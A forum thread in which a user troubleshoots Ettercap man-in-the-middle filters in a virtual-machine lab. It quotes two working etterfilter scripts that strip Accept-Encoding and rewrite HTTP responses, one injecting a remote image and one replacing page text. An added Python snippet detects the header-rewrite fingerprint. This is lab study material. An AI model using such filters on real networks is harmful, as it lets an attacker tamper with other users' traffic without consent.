Ettercap Filter issue with Replace
Hi,
I have been poring over the Internet and especially this forum the last few days to try to find an answer to my problem.
I see that in the past many people have had issues with getting Ettercap filters to work, and I guess I am now one of them :)
I just wanted to try the IronGeek Image Replacement script in my own Lab, which can be found here: http://www.irongeek.com/i.php?page=s...ettercapfilter
I'm running two VMs:
1. BT5 R3 Gnome 64 Bit (though I have tried this now on BT4 R2 and BT5 R2)
2. Windows XP SP2
The filter from the website is this one below:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
    msg("Filter Ran.\n");
}
With this one, no images are replaced; however, sometimes at the bottom of the page a line that might have a javascript src tag will be changed to the image link.
Wireshark shows that the TCP packets are coming in out of order and calling for retransmission. I can see inside that they are getting changed, but then it looks like a retransmission occurs and they are getting replaced, maybe?
I switched the script up some and replaced it with one I found on this website to just change the Title tag:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    msg("in Second IF\n");
    if (search(DECODED.data, "Hello")) {
        replace("Hello", "12345");
        msg("run\n");
    }
    if (search(DATA.data, "Google")) {
        replace("Google", "GOOGLE HACKED");
        msg("run2\n");
    }
}
This one is even more interesting: if a page has those keywords in it, I'll get a "page cannot be displayed". On both I'm getting the msgs showing that the script is getting triggered... /sigh
Any ideas?
I've uncommented the lines in etter.conf for the iptables. I'm also only running ettercap with this, not sslstrip etc.
Thanks for any help you can provide :)
-DV
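As an added example (not part of the original post or of the IronGeek script), here is a small Python check a web server or proxy operator can run over incoming request heads to spot the fingerprint that the first filter leaves: the `Accept-Encoding` header rewritten to `Accept-Rubbish!`, or a browser request arriving with no `Accept-Encoding` at all. The sample requests and the `inspect_request` / `parse_headers` names are constructed for the example.

```python
"""Detect the request-side fingerprint of the header-mangling filter above.

Added example, not code from the original post. The filter rewrites the
'Accept-Encoding' request header to 'Accept-Rubbish!' so the server answers
uncompressed; a server or proxy can flag that header name, and can flag
browser requests that carry no Accept-Encoding (mainstream browsers normally
send one). All sample requests below are constructed.
"""
import re

# Header name the filter substitutes in (same length as the original).
MANGLED_HEADER = "accept-rubbish!"
# User-Agent fragments that almost always come with an Accept-Encoding header.
BROWSER_UA = re.compile(r"Mozilla/|Chrome/|Firefox/|Safari/", re.I)


def parse_headers(raw: str) -> dict:
    """Parse a raw HTTP request head into a lower-cased name -> value dict."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    headers = {}
    for line in lines[1:]:          # lines[0] is the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw: str) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    headers = parse_headers(raw)
    findings = []
    if MANGLED_HEADER in headers:
        findings.append("accept-encoding rewritten to Accept-Rubbish!")
    ua = headers.get("user-agent", "")
    if BROWSER_UA.search(ua) and "accept-encoding" not in headers:
        findings.append("browser request without Accept-Encoding")
    return findings


# Constructed samples: one clean request, one after the filter rewrote the header.
CLEAN = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
         "User-Agent: Mozilla/5.0 Firefox/10.0\r\n"
         "Accept-Encoding: gzip, deflate\r\n\r\n")
MANGLED = CLEAN.replace("Accept-Encoding", "Accept-Rubbish!")

if __name__ == "__main__":
    for label, req in (("clean", CLEAN), ("mangled", MANGLED)):
        print(label, inspect_request(req) or "ok")
```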
Re: Ettercap Filter issue with Replace
Just a quick follow up:
I figured out one problem: I was editing a different etter.conf file; it appears that on BT5 R3 there are two?
One in /etc/ and one in /usr/local/etc, the second one being the one that the ettercap utility was using on my VM.
However, I am still running into the same issues: the web page will just remain unaltered and I keep seeing the TCP Out of Order messages.
Once again, thanks for any help in advance :)
Re: Ettercap Filter issue with Replace
I think I have isolated the problem: it appears that if I'm using VMs from VirtualBox the tests will fail.
However, if I use two separate computers or if I use VMware it seems to work. Weird!